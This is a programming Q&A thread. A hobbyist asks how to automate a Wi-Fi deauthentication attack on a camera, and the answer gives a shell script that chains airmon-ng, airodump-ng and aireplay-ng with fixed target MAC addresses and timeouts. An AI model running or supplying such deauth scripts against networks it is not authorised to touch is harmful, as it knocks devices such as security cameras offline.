# (beginner) How can I optimize this script?

Tags: linux, shell, if-statement, terminal

So I'm really new to this and lack any formal education, I've just been teaching myself as a hobby so I don't have an understanding of what I'm trying to accomplish or the terminology to look up the answer on my room. Allow me to explain.

So I have a raspberry pi set up to deauth a camera I have on my home network (long story) by entering several commands. I decided to create a script to do all the setup and deauth automatically when I execute the file, however, I don't quite understand how to do a few basic things

As of now I have: (and forgive my formatting this is my first post)

```
airmon-ng start wlan1    
#how can I make this run only if wlan1 exists. If it doesn't it needs to skip                       

airodump-ng --bssid E0:22:03:C6:85:F5 -c11 wlan1mon    
#only need this for 3 seconds so how do I send "ctrl-c" and continue running the script?                                                              

aireplay-ng -0 0 -a E0:22:03:C6:85:F5 -c 34:15:13:4C:0B:D6 -x 1 wlan1mon
#another Ctrl c sent here but only after running for 5 min
```

That's basically it. Sorry if this is too simple of a question, I appreciate any help you can offer or if anyone can point me in the right direction where I can learn this on my own that'd be great. Thanks for your time.

Comment: What exactly do you want to do? `run only if wlan1 exists` - how do you "detect" if wlan1 exists? What does it mean "exists"? `need this for 3 seconds so how do I send "ctrl-c"` - you ask how to send 'ctrl-c' to a process after 3 seconds of it beeing running? [timeout](http://man7.org/linux/man-pages/man1/timeout.1.html) and 'ctrl-c' sends SIGINT signal if I remember correctly.

Comment: So with airmon-ng start wlan1, wlan1 will switch modes which also overwrites it's name to wlan1mon so when I said if wlan1 exists I meant wlan1mon hasn't replaced it yet. Thanks for your help

Answer (score 2):

here's a quick (and totally untested) solution to your problem:

```sh
#!/bin/sh

iface="$1"
apmac="E0:22:03:C6:85:F5"
destmac="34:15:13:4C:0B:D6"

# query some info on the selected interface, but discard the results
# we are only interested in the exit code of `ip`
if ip addr show "${iface}" >/dev/null
then
  airmon-ng start ${iface}
  # after 3 seconds, send a SIGINT:
  timeout -s INT 3s airodump-ng --bssid "{apmac}" -c11 "${iface}mon"
  # after 5 minutes, send a SIGINT:
  timeout -s INT 5m aireplay-ng -0 0 -a "${apmac}" -c "${destmac}" -x 1 "${iface}mon"
fi
```

it doesn't *optimize* anything, as *optimization* has a quite specific meaning in software (as in: "make it run more efficient", which is not the same as in "fix the bugs")